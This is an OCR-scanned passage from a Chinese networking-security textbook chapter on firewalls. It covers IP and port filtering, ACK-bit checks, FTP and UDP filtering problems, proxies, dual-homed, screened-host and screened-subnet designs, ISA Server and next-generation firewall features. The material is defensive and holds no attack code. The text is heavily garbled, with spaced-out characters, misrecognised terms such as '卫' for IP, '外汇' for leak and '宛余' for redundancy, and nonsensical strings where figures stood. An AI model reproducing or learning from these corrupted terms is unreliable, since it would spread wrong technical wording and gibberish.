现在 ， 对 防火 墙 进行 配置 ， 把 所 有 发 给 UNIX 计算 机 的 数据 包 全 部 拒绝 ， 完 成 这 项 工 
作 以 后 ， 防 火 墙 会 给 客户 程序 发 一 条 消息 。 既 然 发 向 目标 的 卫 数据 没 法 转发 ， 那 么 只 有 和 
UNIX 计算 机 同 在 一 个 网 段 的 用 户 才能 访问 UNIX 计算 机 。 

还 有 一 种 情况 ， 可 以 针对 PC 客户 机 对 防火 墙 进行 特别 配置 ， 其 他 的 数据 包 可 以 通过 ， 
但 这 台 PC 客户 机 的 不 能 ， 这 正 是 防火 墙 最 基本 的 功能 : 根据 他 地址 做 转发 判断 。 但 黑客 
可 以 采用 人 P 地 址 欺骗 技术 ， 伪 装 成 合法 人 P 地 址 的 计算 机 穿越 信任 这 个 地 址 的 防火 墙 。 不 
过 根据 地 址 的 转发 决策 机 制 还 是 最 基本 和 必需 的 。 另 外 要 注意 的 一 点 是 ,不 要 用 DNS 主机 
名 建立 过 滤 表 ， 因 为 对 DNS 的 伪造 比 卫 地 址 欺骗 要 容易 得 多 。 

服务 器 TCP/UDP 端口 过 滤 如 图 7-10 所 示 。 


服务 器 TCP/UDP 端 口 过 滤 


Telnet 服 务 器 


UNIX 主 机 


防火 墙 阻 寨 所 有 通过 [P 包 发 送 

到 UNIX 主 机 且 TCP 端 口 为 2 的 
包 ，TCP 端 口 不 为 23 的 包 可 通过 
防火 墙 
对 UNIX 主 机 发 起 Telnet 请 求 时 ， 

会 产生 一 个 包 ， 这 个 包 通过 IP 包 
发 送 到 UNIX 主 机 且 TCP 端 口 为 23 


上 
ZX 


Telnet 客 户 机 


7-10 ”服务 器 TCP/UDP 端口 过 滤 


仅仅 依靠 地 址 进行 数据 过 滤 在 实际 运用 中 是 不 可 行 的 ， 还 有 个 原因 就 是 目标 主机 上 往 
往 运 行 着 多 种 通信 服务 。 比 方 说 ， 不 想 让 用 户 采用 telnet 的 方式 连 到 系统 ， 但 这 绝 不 等 于 
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非得 同时 禁止 他 们 使 用 SMTP/POP 邮件 服务 器 吧 ? 所 以 , 在 地 址 之 外 还 要 对 服务 器 的 TCP/ 
UDP 端口 进行 过 滤 。 

例如 ， 默 认 的 telnet 服务 连接 端口 号 是 23 。 假 如 我 们 不 许 PC 客户 机 建立 对 UNIX 计 
算 机 (在 这 时 我 们 当 它 是 服务 器 ) 的 telnet 连接 ， 那 么 只 需 命令 防火 墙 检 查 发 送 目标 是 UNIX 
服务 器 的 数据 包 ， 把 其 中 具有 23 目标 端口 号 的 包 过 滤 就 行 了 。 这 样 ， 把 人 P 地 址 和 目标 服 
务 器 TCP/UDP 端口 结合 起 来 ， 不 就 可 以 作为 过 滤 标准 来 实现 相当 可 靠 的 防火 墙 了 吗 ? 不 ， 
没 这 么 简单 。 

客户 机 也 有 TCP/UDP 端口 过 滤 ， 如 图 7-11 所 示 。 


客户 机 TCPIUDP 端 口 过 滤 
有 UNIX 主 机 


Telnet 服 务 器 Telnet 客 户 机 通过 端口 23 发 送 TCP 
包 到 UNIX 主 机 ，UNIX 主 机 又 通 
过 客户 机 端口 将 响应 包 发 送 回 PC 


[防火墙 


防火 墙 必须 允许 上 述 两 个 包 
通过 ， 才 能 使 会 话 继续 


Telnet 客 户 机 


7-11 客户 机 TCP/UDP 端口 过 滤 


TCP/IP 是 一 种 端 对 端 协议 ， 每 个 网 络 节点 都 具有 唯一 的 地 址 。 网 络 节点 的 应 用 层 也 是 
这 样 ， 处 于 应 用 层 的 每 个 应 用 程序 和 服务 都 具有 自己 的 对 应 “地 址 ”， 也 就 是 端口 号 。 地 
址 和 端口 都 具备 了 才能 建立 客户 机 和 服务 器 的 各 种 应 用 之 间 的 有 效 通 信 联 系 。 比 如 ，telnet 
服务 器 在 端口 23 侦 听 入 站 连接 。 同 时 telnet 客户 机 也 有 一 个 端口 号 ， 否 则 客户 机 的 中 栈 
怎么 知道 某 个 数据 包 是 属于 哪个 应 用 程序 的 呢 ? 

由 于 历史 的 原因 ， 几 乎 所 有 的 TCP/IP 客户 程序 都 使 用 大 于 1023 的 随机 分 配 端 口号 。 
只 有 UNIX 计算 机 上 的 root 用 户 才 可 以 访问 1024 以 下 的 端口 , 而 这 些 端 口 还 保留 为 服务 器 
上 的 服务 所 用 。 所 以 ， 除非 我 们 让 所 有 有 具有 大 于 1023 端口 号 的 数据 包 进 入 网 络 ， 否 则 各 种 
网 络 连 接 都 没 法 正常 工作 。 

这 对 防火 墙 而 言 可 就 麻烦 了 ， 如 果 阻 塞 入 站 的 全 部 端口 ， 那 么 所 有 的 客户 机 都 没 法 使 
用 网 络 资源 。 因 为 服务 器 发 出 响应 外 部 连接 请 求 的 入 站 (就 是 进入 防火 墙 的 意思 ) 数 据 包 也 
没 法 经 过 防火 墙 的 入 站 过 滤 。 反 过 来 ， 打 开 所 有 高 于 1023 的 端口 就 可 行 了 吗 ? 也 不 尽 然 。 
由 于 很 多 服务 使 用 的 端口 都 大 于 1023， 比 如 X client、 基 于 RPC 的 NFS 服务 以 及 为 数 众 多 
的 非 UNIX IP 产品 等 (NetWare/IP) 就 是 这 样 的 。 那 么 允许 达到 1023 端口 标准 的 数据 包 都 进 
入 网 络 的 话 ， 网 络 还 能 说 是 安全 的 吗 ? 连 这 些 客户 程序 都 不 敢 说 自己 是 足够 安全 的 。 

我 们 给 防火 墙 这 样 下 命令 : 已 知 服务 的 数据 包 可 以 进来 其 他 的 全 部 挡 在 防火 墙 之 外 。 
比如 ， 如果 你 知道 用 户 要 访问 Web 服务 器 ， 那 就 只 让 具有 源 端 口号 80 的 数据 包 进 入 网 络 。 
可 采用 双向 过 滤 的 办 法 ， 原 理 如 图 7-12 所 示 。 


JNA ED 


双向 过 滤 


hiE 外 部 Web 服 务 器 


TCP 源 端口 号 防火 墙 阻塞 所 有 不 具有 匹配 
具体 已 知 服务 (如 WWW) 的 
1029 80 TCP 源 端口 号 的 入 站 IP 包 


7-12 ”双向 过 滤 原 理 图 


不 过 新 问题 又 出 现 了 。 首 先 ， 你 怎么 知道 你 要 访问 的 服务 器 具有 哪些 正在 运行 的 端口 
号 呢 ? 像 HTTP 这 样 的 服务 器 本 来 就 是 可 以 任意 配置 的 ， 所 采用 的 端口 也 可 以 随意 配置 。 
如 果 你 这 样 设置 防火 墙 ， 你 就 没 法 访问 那些 未 采用 标准 端口 号 的 网 络 站 点 了 。 反 过 来 ， 你 
也 没 法 保证 进入 网 络 的 数据 包 中 具有 端口 号 80 的 就 一 定 来 自 Web 服务 器 。 有 些 黑客 就 是 
利用 这 一 点 制作 自己 的 入 侵 工具 ， 并 让 其 运行 在 本 机 的 80 端口 。 

源 地 址 和 源 端口 的 不 可 靠 使 得 我 们 只 能 用 TCP 协议 ， 通 过 检查 ACK 位 来 实现 ， 如 
图 7-13 所 示 。 

TCP 是 一 种 可 靠 的 通信 协议 ，“ 可 靠 ”这 个 词 意味 着 协议 具有 包括 纠 错 机 制 在 内 的 一 
些 特 殊 性 质 。 为 了 实现 其 可 靠 性 ， 每 个 TCP 连接 都 要 先 经 过 一 个 “握手 ”过 程 来 交换 连接 
参数 。 还 有 ， 每 个 发 送出 去 的 包 在 后 续 的 其 他 包 被 发 送出 去 之 前 必须 获得 一 个 确认 响应 。 
但 并 不 是 对 每 个 TCP 包 都 非 要 采用 专门 的 ACK 包 来 响应 ， 实 际 上 仅仅 在 TCP 包头 上 设置 
一 个 专门 的 位 就 可 以 完成 这 个 功能 了 。 所 以 ， 只 要 产生 了 响应 包 就 要 设置 ACK 位 。 连 接 会 
话 的 第 一 个 包 不 用 于 确认 ， 所 以 它 就 没有 设置 ACK 位 ， 后 续 会 话 交换 的 TCP 包 就 要 设置 
ACK 位 了 。 


检查 ACK 位 


有 外 部 Web 服 务 器 
回 服务 器 发 送 响应 包 
(设置 了 ACK 位 ) 
加 客户 机 发 送 连接 请 求 


(未 设置 ACK 位 ) 
Ps 让 


7-13 检查 ACK 位 


举 个 例子 ，PC 向 远 端的 Web 服务 器 发 起 一 个 连接 , 它 生成 一 个 没有 设置 ACK 位 的 连 
接 请 求 包 。 当 服务 器 响应 该 请 求 时 ,服务 器 就 发 回 一 个 设置 了 ACK 位 的 数据 包 , 同时 在 包 
里 标记 从 客户 机 所 收 到 的 字 节 数 。 然 后 客户 机 就 用 自己 的 响应 包 再 去 响应 该 数据 包 ， 这 个 
数据 包 也 设置 了 ACK 位 并 标记 了 从 服务 器 收 到 的 字 节 数 。 通 过 监视 ACK 位 ， 我 们 就 可 以 
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将 进入 网 络 的 数据 限制 在 响应 包 的 范围 之 内 。 于 是 ,远程 系统 根本 无 法 发 起 TCP 连接 , 但 
却 能 响应 收 到 的 数据 包 了 。 

这 套 机 制 还 不 能 算是 无 懈 可 击 ， 简 单 地 举 个 例子 ， 假 设 我 们 有 一 台 内 部 Web 服务 器 ， 
那么 端口 80 就 不 得 不 被 打开 以 便 外 部 请 求 可 以 进入 网 络 。 还 有 ， 对 UDP 包 而 言 就 没 法 监 
视 ACK 位 了 ， 因 为 UDP 包 就 没有 ACK 位 。 还 有 一 些 TCP 应 用 程序 ， 比 如 FTP， 连 接 就 
必须 由 这 些 服务 器 程序 自己 发 起 。 


1. FTP 带 来 的 困难 


一 般 的 Intemet 服务 对 所 有 的 通信 都 只 使 用 一 对 端口 号 , FTP 程序 在 连接 期 间 则 使 用 两 
对 端口 号 : 第 一 对 端口 号 用 于 FTP 的 “命令 通道 ”提供 登录 和 执行 命令 的 通信 链 路 ;而 另 
一 对 端口 号 则 用 于 FTP 的 “数据 通道 ”提供 客户 机 和 服务 器 之 问 的 文件 传送 。 

通常 的 FTP 会 话 过 程 中 , 客户 机 首先 向 服务 器 的 端口 21( 命 令 通道 ) 发 送 一 个 TCP 连接 
请 求 ， 然 后 执行 LOGIN、DIR 等 各 种 命令 。 一 旦 用 户 请 求 服务 器 发 送 数据 ，FTP 服务 器 就 
用 其 20 端口 (数据 通道 ) 向 客户 的 数据 端口 发 起 连接 。 问 题 来 了 ， 如 果 服 务 器 向 客户 机 发 起 
传送 数据 的 连接 , 那么 它 就 会 发 送 没有 设置 ACK 位 的 数据 包 , 防火 墙 则 按照 刚才 的 规则 拒 
绝 该 数据 包 ， 同 时 也 就 意味 着 数据 传送 是 不 可 能 的 。 通 常 只 有 高 级 的 防火 墙 才能 看 出 客户 
机 刚才 告诉 服务 器 的 端口 ， 然 后 才 许 可 对 该 端口 的 入 站 连接 。 


2. UDP 端口 过 滤 


我 们 再 看 看 怎么 解决 UDP 问题 。UDP 包 没 有 ACK 位 ， 所 以 不 能 进行 ACK 位 过 滤 ， 
UDP 是 发 出 去 不 管 的 “不 可 靠 ” 通 信 ， 这 种 类 型 的 服务 通常 用 于 广播 、 路 由 、 多 媒体 等 广 
播 形式 的 通信 任务 。NFS、DNS、WINS、NetBIOS-over-TCP/IP 和 NetWare/IP 都 使 用 UDP。 

看 来 最 简单 的 可 行 办 法 就 是 不 允许 建立 入 站 UDP 连接 。 防火 墙 设置 为 只 许 转 发 来 自 内 
部 接口 的 UDP 包 ， 来 自 外 部 接口 的 UDP 包 则 不 转发 。 现 在 的 问题 是 ， 比 方 说 ，DNS 名 称 
解析 请 求 就 使 用 UDP， 如 果 你 提供 DNS 服务 ， 至 少 允许 一 些 内 部 请 求 穿越 防火 墙 。 还 有 
IRC 这 样 的 客户 程序 也 使 用 UDP， 如 果 要 让 你 的 用 户 使 用 它 ， 就 同样 要 让 他 们 的 UDP 包 
进入 网 络 。 我 们 能 做 的 就 是 对 那些 从 本 地 到 可 信任 站 点 之 问 的 连接 进行 限制 。 但 是 ， 什 么 
叫 可 信任 ! 如 果 黑 客 采 取 地 址 欺骗 的 方法 不 就 又 回 到 老路 上 去 了 吗 ? 

有 些 新 型 路 由 器 可 以 通过 “记忆 ”出 站 UDP 包 来 解决 这 个 问题 ， 如 果 入 站 UDP 包 匹 
配 最 近 出 站 UDP 包 的 目标 地 址 和 端口 号 就 让 它 进来 :如 果 在 内 存 中 找 不 到 匹配 的 UDP 包 
就 只 好 拒绝 。 但 是 ， 我 们 如 何 确信 产生 数据 包 的 外 部 主机 就 是 内 部 客户 机 希望 通信 的 服务 
器 呢 ? 如 果 黑 客 诈 称 DNS 服务 器 的 地 址 , 那么 在 理论 上 当然 可 以 从 附着 DNS 的 UDP 端口 
发 起 攻击 。 只 要 你 允许 DNS 查询 和 反馈 包 进 入 网 络 ， 这 个 问题 就 必然 存在 。 解 决 的 办 法 是 
采用 代理 服务 器 。 

所 谓 代理 服务 器 ， 顾 名 思 义 就 是 代表 你 的 网 络 和 外 界 打交道 的 服务 器 。 代 理 服务 器 不 
允许 存在 任何 网 络 内 外 的 直接 连接 。 它 本 身 就 提供 公共 和 专用 的 DNS、 邮 件 服 务 器 等 多 种 
功能 。 代 理 服 务 器 重 写 数据 包 而 不 是 简单 地 将 其 转发 了 事 。 给 人 的 感觉 就 是 网 络 内 部 的 主 
机 都 站 在 了 网 络 的 边缘 ， 但 实际 上 它们 都 躲 在 代理 的 后 面 ， 露 面 的 不 过 是 代理 这 个 假 面具 。 
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7.4.2 ”防火 墙 的 配置 规则 


防火 墙 配置 有 三 种 方式 : Dual-homed 方式 、Screened- host 方式 和 Screened-subnet 方式 。 

1) Dual-homed 方式 

此 种 方式 最 简单 ,Dual-homedGateway 放置 在 两 个 网 络 之 间 , 这 个 Dual-homedGateway 
又 称 为 bastionhost。 这 种 结构 成 本 低 ， 但 是 它 有 单 点 失败 的 问题 。 这 种 结构 没有 增加 网 络 
安全 的 自我 防卫 能 力 ， 而 它 往往 是 受 “黑客 ”攻击 的 首选 目标 ， 它 自己 一 旦 被 攻破 ， 整 个 
网 络 也 就 暴露 了 。 

2) ”Screened-host 方式 

在 此 种 方式 中 的 Screeningrouter 为 保护 Bastionhost 的 安全 建立 了 一 道 屏 障 。 它 将 所 有 
进入 的 信息 先 送 往 Bastionhost， 并 且 只 接受 来 自 Bastionhost 的 数据 作为 出 去 的 数据 。 这 种 
结构 依赖 于 Screeningrouter 和 Bastionhost， 只 要 有 一 个 失败 ， 整 个 网 络 就 暴露 了 。 

3) ”Screened-subnet 方式 

此 种 方式 包含 两 个 Screeningrouter 和 两 个 Bastionhost。 在 公共 网 络 和 私有 网 络 之 间 构 
成 了 一 个 隔离 网 ， 称 为 “停火 区 ”(DMZ)，Bastionhost 放置 在 “停火 区 ”内 。 这 种 结构 安 
全 性 好 ， 只 有 当 两 个 安全 单元 被 破坏 后 ， 网 络 才 被 暴露 ， 但 是 成 本 也 很 昂贵 。 


7.4.3 1ISA Server 的 应 用 


ISA Server 是 建立 在 Windows Server 2008 操作 系统 上 的 一 种 可 扩展 的 企业 级 防火 墙 和 
Web 缓存 服务 器 。ISA Server 的 多 层 防 火 墙 可 以 保护 网 络 资源 免 受 病毒 、 黑 客 的 入 侵 和 未 
经 授权 的 访问 。 而 且 ， 通 过 本 地 而 不 是 Internet 为 对 象 提供 服务 ， 其 Web 缓存 服务 器 允许 
组 织 能 够 为 用 户 提供 更 快 的 Web 访问 。 在 网 络 内 安装 ISA Server 时 ， 可 以 将 其 配置 成 防火 
墙 ， 也 可 以 配置 成 Web 缓存 服务 器 ， 或 二 者 兼备 。 

ISA Server 提供 直观 而 强大 的 管理 工具 ,包括 Microsoft 管理 控制 台 管 理 单元 、 图 形 化 
任务 板 和 逐步 进行 的 向 导 。 利 用 这 些 工具 ，ISA Server 能 将 执行 和 管理 一 个 坚固 的 防火 墙 
和 缓存 服务 器 所 过 到 的 困难 减 至 最 小 。 

ISA Server 提供 一 个 企业 级 Internet 连接 解决 方案 , 它 不 仅 包 括 特性 丰富 且 功 能 强大 的 
防火 墙 ， 还 包括 用 于 加 速 Intermet 连接 的 可 伸缩 的 Web 缓存 。 根据 组 织 网 络 的 设计 和 需要 ， 
ISA Server 的 防火 墙 和 Web 缓存 组 件 可 以 分 开 配 置 ， 也 可 以 一 起 安装 。 

ISA Server 有 两 个 版 本 ， 以 满足 用 户 对 业务 和 网 络 的 不 同 需求 。ISA Server 标准 版 可 以 
为 小 型 企业 、 工 作 组 和 部 门 环境 提供 企业 级 防火 墙 安全 和 Web 缓存 能 力 。ISA Server 企业 
版 是 为 大 型 组 织 设计 的 ， 支 持 多 服务 器 阵列 和 多 层 策略 ， 提 供 更 易 伸 缩 的 防火 墙 和 Web 绥 
存 服务 器 。 

利用 Windows Server 2008 安全 数据 库 ，ISA Server 允许 用 户 根据 特定 的 通信 类 型 ， 为 
Windows Server 2008 内 定义 的 用 户 、 计 算 机 和 组 设置 安全 规则 ， 具 有 先进 的 安全 特性 。 

利用 ISA Management 控制 台 ，ISA Server 使 防火 墙 和 缓存 管理 变 得 很 容易 。ISA 
Management 采用 MMC， 并 且 广 泛 使 用 任务 板 和 向 导 ， 大 大 简化 了 最 常见 的 管理 程序 ， 从 
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图 | 一 一 党 满 关乎 半 ”十 水 关 鹤 和 小 对 当 对 


而 集中 统一 了 服务 器 的 管理 。ISA Server 也 提供 强大 的 基于 策略 的 安全 管理 ， 这 样 ， 管 理 
员 就 能 将 访问 和 带宽 控制 应 用 于 所 设置 的 任何 策略 单元 ， 如 用 户 、 计 算 机 、 协 议 、 内 容 类 
型 、 时 间 表 和 站 点 。 总 之 ，ISA Server 是 一 个 拥有 自己 的 软件 开发 工具 包 和 脚本 示例 的 高 
扩展 性 平台 ， 利 用 它 可 以 根据 自身 业务 需要 量 身 定制 Internet 安全 解决 方案 。 

ISA Server 的 作用 如 下 。 

不 管 是 什么 规模 的 组 织 ， 只 要 它 关心 自己 网 络 的 安全 、 性 能 、 管 理 和 运营 成 本 ， 对 其 
IT 管理 者 、 网 络 管理 员 和 信息 安全 专业 人 员 来 说 ，ISA Server 都 具备 使 用 价值 。ISA Server 
有 三 种 不 同 的 安装 模式 : 防火 墙 (Firewall) 模 式 、 缓 存 (Cache) 模 式 和 和 集成 (Integrated) 模 式 。 
集成 模式 能 够 在 同一 台 计 算 机 上 实现 前 两 种 模式 。 组 织 可 以 有 多 种 联网 方案 来 部 署 ISA 
Server， 包 括 以 下 所 述 的 几 种 方法 。 

(1) Internet 防火 墙 。 

(2) 安全 服务 器 发 布 。 

(3) 正 向 Web 缓存 服务 器 。 

(4) 反 向 Web 缓存 服务 器 。 

(5) 防火 墙 和 Web 缓存 集成 服务 器 。 


7.5 下 一 代 防 火 墙 


下 一 代 防 火 墙 区 别 于 传统 防火 墙 的 核心 特色 之 一 是 对 应 用 的 识别 、 控 制 和 安全 性 保障 。 
这 种 显著 区 别 源 自 于 Web2.0 与 Web1.0 这 两 个 不 同 网 络 时 代 下 的 模式 变迁 。 传统 的 Web1.0 
网 络 以 服务 请 求 与 服务 提供 为 主要 特征 ， 服 务 提供 方 提供 的 服务 形态 、 遵 循 的 协议 都 比较 
固定 和 专 一 ， 随 着 社会 化 网 络 Web2.0 时 代 的 到 来 ， 各 种 服务 协议 、 形 态 已 不 再 一 成 不 变 ， 
代 之 以 复 用 、 变 种 、 行 为 差异 为 主要 特征 的 各 种 应 用 的 使 用 和 共享 。 


7.5.1 新 的 应 用 带 来 全 新 的 应 用 层 威胁 


Web 2.0 应 用 虽然 可 以 显著 增强 协作 能 力 , 提高 工作 效率 , 但 同时 也 不 可 避免 地 带 来 了 
新 的 安全 威胁 。 

1) 恶意 软件 入 侵 

Web 应 用 中 ， 社 交 网 络 的 普及 给 恶意 软件 的 入 侵 带 来 了 巨大 的 便利 ， 例 如 灰色 软件 或 
链接 到 恶意 站 点 的 链接 。 用 户 的 一 条 评价 、 一 篇 帖子 或 者 一 次 照片 上 传 都 可 能 包含 殉 及 用 
户 或 甚至 整个 网 络 的 恶意 代码 。 例 如 ， 如 果 用 户 在 下 载 驱动 程序 的 过 程 中 点 击 了 含有 恶意 
站 点 的 链接 ， 就 很 有 可 能 在 不 知情 的 情况 下 下 载 了 恶意 软件 。 

2) 网 络 带宽 消耗 

对 于 部 分 应 用 来 说 ， 广 泛 的 使 用 会 导致 网 络 带宽 的 过 度 消 耗 。 例 如 优酷 视频 可 以 导致 
网 络 拥塞 并 阻碍 关键 业务 使 用 和 交付 。 还 有 对 于 文件 共享 类 应 用 ， 由 于 存在 大 量 的 文件 之 
间 的 频繁 交换 ， 也 可 能 会 最 终 导致 网 络 陷入 瘫痪 。 
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3) 机 密 资 料 外 汇 

某 些 应 用 (如 即时 通信 ,，P2P 下 载 等 ) 可 提供 向 外 传输 文件 附件 的 功能 ， 如 果 对 外 传输 的 
这 些 文件 存在 敏感 、 机 密 的 信息 ， 那 么 将 给 企业 带 来 无 形 和 有 形 资产 的 损失 ， 并 且 也 会 带 
来 潜在 的 民事 和 刑事 责任 。 


7.5.2 传统 防火 墙 的 弊端 


由 于 传统 的 防火 墙 的 基本 原理 是 根据 IP 地 址 /端口 号 或 协议 标识 符 来 识别 和 分 类 网 络 
流量 ， 并 执行 相关 的 策略 。 对 于 Web 2.0 应 用 来 说 ， 传 统 防火 墙 看 到 的 所 有 基于 浏览 器 的 
应 用 程序 的 流量 是 完全 一 样 的 ， 因 而 无 法 区 分 各 种 应 用 程序 ， 更 无 法 实施 策略 来 区 分 哪些 
是 不 需要 的 或 不 适当 的 程序 ， 或 者 允许 这 些 应 用 程序 。 如 果 通 过 这 些 端口 屏蔽 相关 的 流量 
或 者 协议 ， 会 导致 阻止 所 有 基于 Web 的 流量 ， 其 中 包括 合法 商业 用 途 的 内 容 和 服务 。 另 外 
传统 防火 墙 也 检测 不 到 基于 隧道 的 应 用 ， 以 及 加 密 后 的 数据 包 ， 甚 至 不 能 屏蔽 使 用 非 标准 
端口 号 的 非法 应 用 。 


7.5.3 下 一 代 防 火 墙 的 安全 策略 框架 
下 一 代 防 火 墙 的 核心 理念 是 在 企业 网 络 边界 建立 以 应 用 为 核心 的 网 络 安全 策略 ， 通 过 


智能 化 识别 、 精 细 化 控制 、 一 体 化 扫描 等 逐 层 递 进 方式 实现 用 户 / 应 用 行为 的 可 视 ， 可 控 、 
合 规 和 安全 ， 从 而 保障 网 络 应 用 被 安全 高 效 的 使 用 。 其 安全 策略 框架 如 图 7-14 所 示 。 


图 7-14 下 一 代 防火 墙 的 核心 理念 


1. 智能 化 识别 


通过 智能 化 应 用 、 用 户 识别 技术 可 将 网 络 中 简单 的 也 地址 /端口 号 信息 转换 为 更 容易 
识别 ， 且 更 加 智能 化 的 用 户 身份 信息 和 应 用 程序 信息 ， 为 下 一 代 防 火 墙 后 续 的 基于 应 用 的 
策略 控制 和 安全 扫描 提供 的 识别 基础 。 例 如 : 对 于 同样 一 条 数据 信息 ， 传 统 防火 墙 看 到 的 
是 : 某 源 卫 通过 某 端口 访问 了 某 目 的 瑟 ; 下 一 代 防 火 墙 看 到 的 是 : 国内 某 公 司 某 人 通过 
QQ 给 远 在 欧洲 的 某 人 传输 了 一 个 PDF 文件 ， 如 图 7-15 所 示 。 
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2. 精细 化 控制 


下 一 代 防 火 墙 可 以 根据 风险 级 别 、 应 用 类 型 是 否 消耗 带宽 等 多 种 方式 对 应 用 进行 分 类 ， 
并 且 通 过 应 用 访问 控制 ， 应 用 带宽 管理 或 者 应 用 安全 扫描 等 不 同 的 策略 对 应 用 分 别 进行 细 
粒度 的 控制 。 相 对 于 传统 防火 墙 ， 下 一 代 防 火 墙 可 以 区 分 同一 个 应 用 的 合法 行为 和 非法 行 
为 ， 并 且 对 非法 行为 进行 阻 断 。 如 : 下 一 代 防 火 墙 可 以 允许 使 用 QQ 的 前 提 下 ， 禁 止 QQ 
的 文件 传输 动作 ， 从 而 一 定 程度 上 避免 公司 员工 由 于 传输 QQ 文件 造成 的 内 部 信息 泄露 ， 
如 图 7-16 所 示 。 
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允许 HTTP 网 页 访问 ， 并 且 需 要 保障 带宽 
允许 Gmail , QQ, POP3 等 邮件 类 型 访问 


应 允许 进行 Oracle 数 据 库 系统 访问 
| 用 应 应 

屋 时 中 允许 远 各 上面 ， 但 需要 进行 [ps 扫 交 
| 则 避 全 允许 SSH 协 议 通 过 但 要 经 过 IPS 扫 撕 

\ 控 昌 扫 人 允许 使 用 网 盘 ， 但 需要 AV 扫 描 文 件 ， 
| 制 理 摘 
禁 上 QQ 传输 PDF 格式 文档 

禁止 PPTV，QVOD 等 网 络 电视 程序 
\ 欧 | 上 bi 雷 下 载 RYVB 文 人 格式 视频 
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3. 一 体 化 扫描 


在 完成 智能 化 识别 和 精细 化 控制 以 后 ， 对 允许 使 用 且 存在 高 安全 风险 的 网 络 应 用 ， 下 
一 代 防 火 墙 可 以 进行 漏洞 、 病 毒 、URL 和 内 容 等 不 同 层次 深度 扫描 ， 如 果 发 现 该 应 用 中 存 
在 安全 风险 或 攻击 行为 可 以 做 进一步 的 阻 断 等 动作 。 下 一 代 防 火 墙 在 引擎 设计 上 采用 了 单 
次 解析 架构 ， 这 种 引擎 架构 可 以 保证 引擎 系统 在 数据 流 流 入 时 ， 一 次 性 地 完成 策略 查找 ， 
应 用 程序 识别 /协议 以 及 内 容 扫描 (病毒 ， 间 谍 程 序 ， 入 侵 防御 ) 等 工作 ， 从 而 在 保证 扫描 效 
果 的 前 提 下 大 大 提升 了 扫描 效率 ， 如 图 7-17 所 示 。 
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一 体 化 安全 威 助 扫描 


图 7-17 下 一 代 防火 墙 的 应 用 扫描 
7.5.4 下 一 代 防 火 墙 功 能 


1. 基于 用 户 防 护 


传统 防火 墙 策略 都 是 依赖 他 或 MAC 地 址 来 区 分 数据 流 ， 不 利于 管理 也 很 难 完成 对 网 
络 状况 的 清晰 掌握 和 精确 控制 。 此 外 还 集成 了 安全 准 入 控制 功能 ， 支 持 多 种 认证 协议 与 认 
证 方式 ， 实 现 了 基于 用 户 的 安全 防护 策略 部 署 与 可 视 化 管控 。 

2. 面向 应 用 安全 


在 应 用 安全 方面 ， 下 一 代 防火 墙 应 该 包括 “智能 流 检测 ”和 “虚拟 化 远程 接 入 ”两 点 。 
一 方面 可 以 做 到 对 各 种 应 用 的 深层 次 的 识别 ， 另 一 方面 在 解决 数据 安全 性 问题 上 ， 通 过 将 
虚拟 化 技术 与 远程 接 入 技术 相 结合 ， 为 远程 接 入 终端 提供 虚拟 应 用 发 布 与 虚拟 桌面 功能 ， 
使 其 本 地 无 须 执 行 任何 应 用 系统 客户 端 程序 的 情况 下 完成 与 内 网 服务 器 端的 数据 交互 ， 就 
可 以 实现 终端 到 业务 系统 的 “无 痕 访 问 ”， 进 而 达到 终端 与 业务 分 离 的 目的 。 

3. 高 效 转发 平台 


为 了 突破 传统 网 关 设 备 的 性 能 瓶颈 ， 下 一 代 防火 墙 可 以 通过 整 机 的 并 行 多 级 硬件 架构 
设计 ， 将 NSE( 网 络 服务 引擎) 与 SE( 安 全 引擎 ) 独 立 部 署 。 网 络 服务 引擎 完成 底层 路 由 /交换 
转发 ， 并 对 整 机 各 模块 进行 管理 与 状态 监控 ， 而 安全 引擎 负责 将 数据 流 进行 网 络 层 安全 处 
理 与 应 用 层 安 全 处 理 。 通 过 部 署 多 安全 引擎 与 多 网 络 服务 引擎 的 方式 来 实现 整 机 流量 的 分 
布 式 并 行 处 理 与 故障 切换 功能 。 

4. 多 层级 宛 余 架构 

下 一 代 防 火 墙 设备 自身 要 有 一 套 完善 的 业务 连续 性 保障 方案 。 针 对 这 一 需求 ， 必 须 采 
用 多 层级 元 余 化 设计 。 在 设计 中 ， 通 过 板 卡 元 余 、 模 块 元 余 以 及 链 路 元 余 来 构建 底层 物理 
级 元 余 ; 使 用 双 操 作 系统 来 提供 系统 级 宛 余 ;而 采用 多 机 宛 余 及 负载 均衡 进行 设备 部 署 实 
现 了 方案 级 元 余 。 由 物理 级 、 系 统 级 与 方案 级 共同 构成 了 多 层级 的 元 余 化 架构 体系 。 
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5. 全 方位 可 视 化 

下 一 代 防 火 墙 还 要 注意 “眼球 经 济 ” 效 应 ， 必 须 提供 丰富 的 展示 方式 ， 从 应 用 和 用 户 
视角 多 层面 的 将 网 络 应 用 的 状态 展现 出 来 ， 包 括 对 历史 的 精确 还 原 和 对 各 种 数据 的 智能 
计 分 析 ， 使 管理 者 清晰 地 认 知 网 络 运 行 状态 。 实 施 可 视 化 所 要 达到 的 效果 是 ， 对 于 管理 范 
围 内 任意 一 台 主机 的 网 络 应 用 情况 及 安全 事件 信息 可 以 进行 准确 的 定位 与 实时 跟踪 ; 对 于 
全 网 产生 的 海量 安全 事件 信息 ， 通 过 深入 的 数据 挖掘 能 够 形成 安全 趋势 分 析 ， 以 及 各 类 图 
形 化 的 统计 分 析 报 告 。 


6. 安全 技术 融合 


动态 云 防护 和 全 网 威胁 联防 是 技术 融合 的 典范 。 下 一 代 防 火 墙 的 整套 安全 防御 体系 都 
应 该 是 基于 动态 云 防护 设计 的 。 一 方面 可 以 通过 “ 云 ”来 收集 安全 威胁 信息 并 快速 寻找 解 
决 方案 ， 及 时 更 新 攻击 防护 规则 库 并 以 动态 的 方式 实时 部 署 到 各 用 户 设备 中 ， 保 证 用 户 的 
安全 防护 策略 得 到 及 时 、 准 确 的 动态 更 新 ; 另 一 方面 ， 通 过 “ 云 ”， 使 得 策略 管理 体系 的 
安全 策略 漂移 机 制 能 够 实现 物理 网 络 基于 “人 ”、 虚 拟 计算 环境 基于 “VM”( 虚 拟 机 ) 的 安 
全 策略 动态 部 署 。 


小 ” 结 


本 章 主要 介绍 了 防火 墙 的 基本 概念 、 功 能 和 规则 ， 以 及 防火 墙 的 分 类 和 体系 结构 ， 重 
点 讲述 了 防火 墙 的 应 用 方法 ， 以 及 下 一 代 防 火 墙 的 策略 框架 和 功能 ， 学 习 完 本 章 后 可 以 掌 
握 有 关 防 火 墙 的 相关 知识 ， 系 统 地 了 解 防火 墙 的 应 用 方法 。 


本 章 实 训 
实 训 1ISA 的 构建 与 配置 


